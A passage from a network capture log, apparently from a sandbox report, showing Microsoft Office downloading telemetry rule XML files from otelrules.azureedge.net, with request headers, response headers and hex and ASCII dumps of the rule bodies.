T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:39 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:39 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:39 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: a4b2601f-a01e-006f-5d5f-2e13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163139Z-15869dbbcc6lxrkghC1DFWp3wc00000003wg000000006rmq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:39 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.5	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:39 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:39 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:39 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163139Z-16547b76f7f7jnp2hC1DFWfc3000000003x000000000h7dv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:39 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.5	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:39 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:39 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:39 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163139Z-16547b76f7frbg6bhC1DFWr54000000003sg00000000k595 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:39 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.5	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:40 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:40 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:40 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 72e3f643-801e-007b-5dd2-2ce7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163140Z-16547b76f7fvllnfhC1DFWxkg800000003xg00000000fec5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:40 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.5	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:40 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:40 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:40 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 9ee4ffc0-f01e-0020-735c-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163140Z-176bd8f9bc5dfnrlhC1DFW9ueg00000005m000000000ctms x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:40 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.5	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:40 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:40 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:40 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163140Z-16547b76f7fknvdnhC1DFWxnys00000004000000000050bg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:40 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.5	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:40 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:40 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:40 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163140Z-16547b76f7f7jnp2hC1DFWfc3000000003x000000000h7f7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:40 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.5	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:41 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:41 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:41 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: d3e67c0a-b01e-0001-495c-2e46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163141Z-176bd8f9bc5dfnrlhC1DFW9ueg00000005m000000000ctp6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:41 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.5	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:41 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:41 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:41 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: fdb02178-a01e-001e-0b60-2e49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163141Z-r159446fcd7dbksqhC1DFW8q6g00000000fg000000001nd8 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:41 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.5	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:41 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:41 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:41 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 86102881-001e-0034-7355-2edd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163141Z-15869dbbcc6pfq2ghC1DFW0bk000000003tg000000008bry x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:41 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.5	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:41 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:41 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:41 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 7b700101-601e-0050-4e5f-2e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163141Z-15869dbbcc662ldwhC1DFW5zvg00000003ng00000000faav x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:41 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.5	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:42 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:42 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:42 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 87c6e767-f01e-003c-4308-2c8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163142Z-16547b76f7fx6rhxhC1DFW76kg00000003sg00000000t7b2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:42 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
